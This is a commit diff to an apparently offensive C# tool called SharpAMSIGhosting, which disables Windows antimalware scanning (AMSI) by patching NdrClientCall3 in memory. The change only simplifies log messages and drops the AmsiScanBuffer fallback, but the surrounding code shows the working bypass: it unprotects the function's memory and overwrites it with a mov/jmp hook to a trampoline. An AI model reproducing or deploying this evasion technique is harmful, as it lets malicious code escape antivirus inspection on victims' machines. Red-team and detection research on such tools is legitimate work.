From d4273e7230aad0b6ad3e86675513710b7e48b774 Mon Sep 17 00:00:00 2001 From: heqnx Date: Fri, 2 May 2025 13:54:21 +0300 Subject: removed the amsiscanbuffer fallback --- SharpAMSIGhosting/Program.cs | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/SharpAMSIGhosting/Program.cs b/SharpAMSIGhosting/Program.cs index 75fb518..c9405e6 100644 --- a/SharpAMSIGhosting/Program.cs +++ b/SharpAMSIGhosting/Program.cs @@ -84,10 +84,10 @@ namespace AmsiGhost bool protectResult = Mem.VirtualProtect(func, new UIntPtr(PATCH_SIZE), PAGE_EXECUTE_READWRITE, out oldProtect); if (!protectResult) { - Console.WriteLine($"[-] Failed to unprotect {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory"); + Console.WriteLine("[-] Failed to unprotect NdrClientCall3 memory"); return; } - Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} memory unprotected"); + Console.WriteLine("[+] NdrClientCall3 memory unprotected"); long trampAddr = trampoline.ToInt64(); byte[] patch = new byte[] { 0x48, 0xB8 } @@ -95,9 +95,8 @@ namespace AmsiGhost .Concat(new byte[] { 0xFF, 0xE0 }) .ToArray(); Marshal.Copy(patch, 0, func, patch.Length); - Console.WriteLine($"[+] Patch written to {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")}"); - - Console.WriteLine($"[+] {(func == Mem.GetProcAddress(lib, "NdrClientCall3") ? "NdrClientCall3" : "AmsiScanBuffer")} patched - AMSI Ghosting"); + Console.WriteLine("[+] Patch written to NdrClientCall3"); + Console.WriteLine("[+] NdrClientCall3 patched - AMSI ghosting complete"); } catch (Exception ex) { -- cgit v1.2.3